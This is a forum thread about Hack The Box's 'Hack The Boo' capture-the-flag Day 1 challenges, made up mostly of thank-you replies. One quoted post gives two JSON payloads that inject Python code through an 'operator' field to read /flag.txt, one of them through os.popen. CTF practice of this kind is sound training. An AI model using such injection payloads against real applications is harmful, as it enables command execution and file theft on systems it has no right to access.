[Hack The Boo] Day 1 Challenges
by - Thursday, January 1, 1970 at 12:00 AM
(October 23, 2022, 05:51 PM)o2n Wrote: {"current_health":"100","attack_power":"100","operator":"+ 1; result=open('/flag.txt', 'r').readline()#"}

{"current_health":"100","attack_power":"100","operator":"; result=__import__('os').popen('cat /flag.txt').read();"}

Tried both in burp for web challenge, still the request is "HTB{f4k3_fl4g_f0r_t3st1ng}"


Sounds like you are testing it against you own target? You have to spawn the docker instance on the challenge page
Reply
thanks
Reply
(October 22, 2022, 02:56 PM)lnf02 Wrote: Hey guys! 

Sharing a few resolutions for the new HTB Event. 
  • Web challenge:
You can manipulate the "operator" parameter...




Currently working on the Crypto Challenge...

Thanks!
Reply
thanx!
Reply
ty 😊
Reply
tyvm!
Reply
thanks
Reply
(October 22, 2022, 02:56 PM)lnf02 Wrote: Hey guys! 

Sharing a few resolutions for the new HTB Event. 
  • Web challenge:
You can manipulate the "operator" parameter...




Currently working on the Crypto Challenge...


thx
Reply
thanks
Reply
thanks
Reply


 Users viewing this thread: [Hack The Boo] Day 1 Challenges: No users currently viewing.